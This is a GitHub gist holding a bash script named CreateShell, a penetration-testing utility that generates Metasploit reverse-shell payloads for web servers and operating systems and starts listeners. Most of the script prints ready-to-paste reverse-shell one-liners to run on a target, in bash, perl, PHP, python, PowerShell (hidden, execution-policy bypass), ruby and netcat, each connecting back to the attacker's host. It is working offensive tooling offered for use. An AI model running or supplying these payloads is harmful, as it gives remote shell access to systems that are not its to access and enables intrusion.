Skip to content

Instantly share code, notes, and snippets.

@danieljs777

danieljs777/createshell.sh

Last active March 26, 2021 22:52
Show Gist options
  • Save danieljs777/2222ad6e9b433147ccff413c0c805722 to your computer and use it in GitHub Desktop.
Save danieljs777/2222ad6e9b433147ccff413c0c805722 to your computer and use it in GitHub Desktop.
Download ZIP
CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells
Raw
createshell.sh
#!/bin/bash
if [ $# -eq 0 ]
then
echo "##############################################################";
echo "# CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells";
echo "# By Daniel (daniel@zillius.com.br) ";
echo "# Usage: createshell.sh lhost lport payload ";
echo "#";
echo "# MSF short payloads : ";
echo "# [php|jsp|war|asp|python|bash|perl|linux32|linux64|win32|win64|osx]";
echo "# OR [msfvenom_default_payload]";
echo "#";
echo "# Raw payloads : ";
echo "# [rawbash|rawbash2|rawperl|rawphp|rawphp_shellexec|rawphp_system|rawpython|rawps|rawps2|rawps_base64|rawnc]";
exit;
fi
case "$3" in
#############################
#WEB SERVERS
"php")
payload="php/meterpreter_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.php;
;;
"jsp")
payload="java/jsp_shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.jsp;
;;
"war")
payload="java/jsp_shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f war > shell.war;
;;
"asp")
payload="windows/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f asp > shell.asp;
;;
#############################
#LOCAL INTERPRETERS
"python")
payload="cmd/unix/reverse_python";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.py
;;
"bash")
payload="cmd/unix/reverse_bash";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.sh
;;
"perl")
payload="cmd/unix/reverse_perl";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.pl
;;
#############################
#OPERATING SYSTEMS
"linux32")
payload="linux/x86/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf > shell.elf
;;
"linux64")
payload="linux/x64/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf > shell.elf
;;
"win32")
payload="windows/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe > shell.exe
;;
"win64")
payload="windows/x64/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe > shell.exe
;;
"osx")
payload="osx/x86/shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f macho > shell.macho
;;
#############################
#RAW CONNECTIONS WITHOUT NC ON TARGET
"rawbash")
echo '###########################';
echo 'Type at target: ';
echo 'bash -i >& /dev/tcp/'$1'/'$2' 0>&1';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawbash2")
echo '###########################';
echo 'Type at target: ';
echo '0<&196;exec 196<>/dev/tcp/'$1'/'$2'; bash <&196 >&196 2>&196';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawperl")
echo '###########################';
echo 'Type at target: ';
echo "perl -e 'use Socket;"'$i="'$1'";''$p='$2';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawphp")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');exec("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawphp_shellexec")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');shell_exec("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawphp_system")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');system("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawpython")
echo '###########################';
echo 'Type at target: ';
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'"'$1'"'","$2"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["'"/bin/sh"'","'"-i"'"]);'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawps")
echo '###########################';
echo 'Type at target: ';
echo 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawps2")
echo '###########################';
echo 'Type at target: ';
echo "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('"$1"',"$2");\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + '"'PS '"' + (pwd).Path + '"'> '"';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawps_base64")
echo '###########################';
echo 'Type at target: ';
echo 'powershell -e ';
echo '$client = New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | base64;
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawruby")
echo '###########################';
echo 'Type at target: ';
echo "ruby -rsocket -e'f=TCPSocket.open(\""$1\"","$2").to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawnc")
echo '###########################';
echo 'Type at target: ';
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "$1" "$2" >/tmp/f";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
*)
echo '###########################';
echo 'Right! Custom payload detected! Please input your desired format:'
read format
echo 'Right! Please input desired final extension:'
read extension
echo msfvenom -p $3 LHOST=$1 LPORT=$2 -f $format > shell.$extension;
payload="$3";
;;
esac
if [ -z "$payload" ]
then
echo "Payload missed"
else
msfconsole -x "use exploit/multi/handler;set PAYLOAD $payload;set LHOST $1;set LPORT $2;set ExitOnSession false;exploit -j -z";
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment